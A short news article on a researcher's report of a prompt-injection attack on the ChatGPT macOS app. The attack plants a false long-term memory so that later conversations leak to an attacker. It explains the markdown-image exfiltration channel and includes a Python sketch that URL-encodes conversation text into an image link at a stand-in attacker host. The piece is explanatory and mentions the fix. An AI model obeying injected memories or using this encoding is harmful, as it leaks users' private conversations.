Hacker creates false memories in ChatGPT to steal victim data — but it might not be as bad as it sounds

Security researchers have exposed a vulnerability that could allow threat actors to store malicious instructions in a user’s memory settings in the ChatGPT macOS app.

A report from Johann Rehberger at Embrace The Red details how an attacker could use a prompt injection to take control of ChatGPT and then insert a malicious memory into its long-term storage and persistence mechanism. Because the memory survives across sessions, both sides of every subsequent conversation can be exfiltrated straight to the attacker’s server.
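In Rehberger's demonstration, the exfiltration channel reportedly relied on the client rendering attacker-controlled markdown images: the injected memory instructs the model to embed each conversation turn, URL-encoded, into an image address, so merely fetching the "image" leaks the text to the attacker's server. A minimal sketch of that encoding step (the domain and query parameter here are hypothetical placeholders, not the payload from the report):

```python
from urllib.parse import quote

def exfil_image_markdown(conversation_text: str) -> str:
    """Illustrative only: encode conversation text into a markdown image URL.

    When a chat client renders this markdown, it issues an HTTP GET to the
    attacker's server with the conversation text in the query string --
    no user click required. 'attacker.example' and the 'q' parameter are
    hypothetical stand-ins for whatever endpoint an attacker controls.
    """
    encoded = quote(conversation_text, safe="")
    return f"![](https://attacker.example/log?q={encoded})"

print(exfil_image_markdown("user: here is my secret"))
```

This is why the fix on the client side is to restrict which domains images may be loaded from, rather than trying to filter the model's output text.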
